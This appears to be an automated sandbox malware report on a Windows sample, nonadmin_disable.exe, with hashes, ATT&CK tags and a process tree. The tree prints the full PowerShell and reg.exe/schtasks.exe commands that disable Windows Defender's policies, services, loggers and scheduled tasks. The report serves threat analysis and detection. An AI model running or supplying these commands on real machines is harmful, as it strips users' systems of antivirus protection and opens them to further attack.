5e7c51cdbaaea395aec1e337592e4e210a698c47fe51d4e5f7b96166cacfd9bf

Analysis

max time kernel
30s
max time network
33s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
06/01/2023, 17:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

nonadmin_disable.exe
Size

119KB
MD5

dc83dd2798a8ed47fde094ec809ea42b
SHA1

0f40cbafb0be6e18a1e83138625a555261e34583
SHA256

5e7c51cdbaaea395aec1e337592e4e210a698c47fe51d4e5f7b96166cacfd9bf
SHA512

d96133753e4a3ca779b3910069486b24088113546901fd8178e05b3289325fd9e04665f75137bcb35a23ca85687506ad25e1f3d54a96ccbd0fe06f7340c93ed1
SSDEEP

3072:Jpvb7RV/8hhb3dLUK94IgqHniOSyaZoc7QNPnP9TBfWSiwp:z9VkhhrdYK94IgqHniOSyaZoc7QNPnPP

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "0"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "0"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "0"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry key 1 TTPs 11 IoCs

Modify Registry

T1112

pid	Process
1840	reg.exe
1968	reg.exe
932	reg.exe
828	reg.exe
1708	reg.exe
1784	reg.exe
1756	reg.exe
748	reg.exe
976	reg.exe
964	reg.exe
2044	reg.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1360	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1360	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1736 wrote to memory of 1360	1736	nonadmin_disable.exe	28
PID 1736 wrote to memory of 1360	1736	nonadmin_disable.exe	28
PID 1736 wrote to memory of 1360	1736	nonadmin_disable.exe	28
PID 1360 wrote to memory of 772	1360	powershell.exe	30
PID 1360 wrote to memory of 772	1360	powershell.exe	30
PID 1360 wrote to memory of 772	1360	powershell.exe	30
PID 1360 wrote to memory of 1116	1360	powershell.exe	31
PID 1360 wrote to memory of 1116	1360	powershell.exe	31
PID 1360 wrote to memory of 1116	1360	powershell.exe	31
PID 1360 wrote to memory of 1404	1360	powershell.exe	32
PID 1360 wrote to memory of 1404	1360	powershell.exe	32
PID 1360 wrote to memory of 1404	1360	powershell.exe	32
PID 1360 wrote to memory of 1508	1360	powershell.exe	33
PID 1360 wrote to memory of 1508	1360	powershell.exe	33
PID 1360 wrote to memory of 1508	1360	powershell.exe	33
PID 1360 wrote to memory of 1280	1360	powershell.exe	34
PID 1360 wrote to memory of 1280	1360	powershell.exe	34
PID 1360 wrote to memory of 1280	1360	powershell.exe	34
PID 1360 wrote to memory of 544	1360	powershell.exe	35
PID 1360 wrote to memory of 544	1360	powershell.exe	35
PID 1360 wrote to memory of 544	1360	powershell.exe	35
PID 1360 wrote to memory of 288	1360	powershell.exe	36
PID 1360 wrote to memory of 288	1360	powershell.exe	36
PID 1360 wrote to memory of 288	1360	powershell.exe	36
PID 1360 wrote to memory of 336	1360	powershell.exe	37
PID 1360 wrote to memory of 336	1360	powershell.exe	37
PID 1360 wrote to memory of 336	1360	powershell.exe	37
PID 1360 wrote to memory of 304	1360	powershell.exe	38
PID 1360 wrote to memory of 304	1360	powershell.exe	38
PID 1360 wrote to memory of 304	1360	powershell.exe	38
PID 1360 wrote to memory of 952	1360	powershell.exe	39
PID 1360 wrote to memory of 952	1360	powershell.exe	39
PID 1360 wrote to memory of 952	1360	powershell.exe	39
PID 1360 wrote to memory of 1016	1360	powershell.exe	40
PID 1360 wrote to memory of 1016	1360	powershell.exe	40
PID 1360 wrote to memory of 1016	1360	powershell.exe	40
PID 1360 wrote to memory of 240	1360	powershell.exe	41
PID 1360 wrote to memory of 240	1360	powershell.exe	41
PID 1360 wrote to memory of 240	1360	powershell.exe	41
PID 1360 wrote to memory of 316	1360	powershell.exe	42
PID 1360 wrote to memory of 316	1360	powershell.exe	42
PID 1360 wrote to memory of 316	1360	powershell.exe	42
PID 1360 wrote to memory of 976	1360	powershell.exe	43
PID 1360 wrote to memory of 976	1360	powershell.exe	43
PID 1360 wrote to memory of 976	1360	powershell.exe	43
PID 1360 wrote to memory of 1784	1360	powershell.exe	44
PID 1360 wrote to memory of 1784	1360	powershell.exe	44
PID 1360 wrote to memory of 1784	1360	powershell.exe	44
PID 1360 wrote to memory of 1720	1360	powershell.exe	45
PID 1360 wrote to memory of 1720	1360	powershell.exe	45
PID 1360 wrote to memory of 1720	1360	powershell.exe	45
PID 1360 wrote to memory of 1712	1360	powershell.exe	46
PID 1360 wrote to memory of 1712	1360	powershell.exe	46
PID 1360 wrote to memory of 1712	1360	powershell.exe	46
PID 1360 wrote to memory of 112	1360	powershell.exe	47
PID 1360 wrote to memory of 112	1360	powershell.exe	47
PID 1360 wrote to memory of 112	1360	powershell.exe	47
PID 1360 wrote to memory of 432	1360	powershell.exe	48
PID 1360 wrote to memory of 432	1360	powershell.exe	48
PID 1360 wrote to memory of 432	1360	powershell.exe	48
PID 1360 wrote to memory of 1352	1360	powershell.exe	49
PID 1360 wrote to memory of 1352	1360	powershell.exe	49
PID 1360 wrote to memory of 1352	1360	powershell.exe	49
PID 1360 wrote to memory of 1756	1360	powershell.exe	50

C:\Users\Admin\AppData\Local\Temp\nonadmin_disable.exe
"C:\Users\Admin\AppData\Local\Temp\nonadmin_disable.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1736
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" –NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\B67.tmp\B68.tmp\B69.ps1
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1360
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    3⤵
    PID:772
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:1116
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f
    3⤵
    PID:1404
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f
    3⤵
    PID:1508
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1280
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 0 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:544
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 0 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:288
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 0 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:336
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 0 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:304
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
    3⤵
    PID:952
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
    3⤵
    PID:1016
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v SpynetReporting /t REG_DWORD /d 0 /f
    3⤵
    PID:240
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f
    3⤵
    PID:316
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f
    3⤵
    - Modifies registry key
    PID:976
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f
    3⤵
    - Modifies registry key
    PID:1784
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
    3⤵
    PID:1720
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    3⤵
    PID:1712
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    3⤵
    PID:112
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    3⤵
    PID:432
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    3⤵
    PID:1352
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" delete HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v "Windows Defender" /f
    3⤵
    - Modifies registry key
    PID:1756
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Windows Defender" /f
    3⤵
    - Modifies registry key
    PID:748
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsDefender /f
    3⤵
    - Modifies registry key
    PID:964
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" delete HKCR\*\shellex\ContextMenuHandlers\EPP /f
    3⤵
    PID:1972
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" delete HKCR\Directory\shellex\ContextMenuHandlers\EPP /f
    3⤵
    PID:1112
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" delete HKCR\Drive\shellex\ContextMenuHandlers\EPP /f
    3⤵
    PID:1384
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WdBoot /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies registry key
    PID:1840
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WdFilter /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies registry key
    PID:1968
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies registry key
    PID:932
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies registry key
    PID:828
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies security service
    - Modifies registry key
    PID:2044
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies registry key
    PID:1708

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\B67.tmp\B68.tmp\B69.ps1

Filesize
6KB

MD5
46b988146ecd9692a2e470fbfc3a7981

SHA1
87c28487611b904beabeae5e19cd43dc7f34acee

SHA256
dcc7120b73141d32d333c91d33a89f78da0ad3d956ba9118b15e553aee66e389

SHA512
1399fa1d43902b57d14709d84c5a22bdda942bb226a7e0a709b1f78a635062b909e67843313f80e701808daf7820c1cf8dcc4d65b13bccd863876c6195626393

Download Submit
memory/1360-94-0x0000000002504000-0x0000000002507000-memory.dmp

Filesize
12KB

Download
memory/1360-95-0x000000000250B000-0x000000000252A000-memory.dmp

Filesize
124KB

Download
memory/1360-79-0x000000000250B000-0x000000000252A000-memory.dmp

Filesize
124KB

Download
memory/1360-58-0x000007FEF2F80000-0x000007FEF3ADD000-memory.dmp

Filesize
11.4MB

Download
memory/1360-59-0x0000000002504000-0x0000000002507000-memory.dmp

Filesize
12KB

Download
memory/1360-57-0x000007FEF3AE0000-0x000007FEF4503000-memory.dmp

Filesize
10.1MB

Download
memory/1736-54-0x000007FEFBE41000-0x000007FEFBE43000-memory.dmp

Filesize
8KB

Download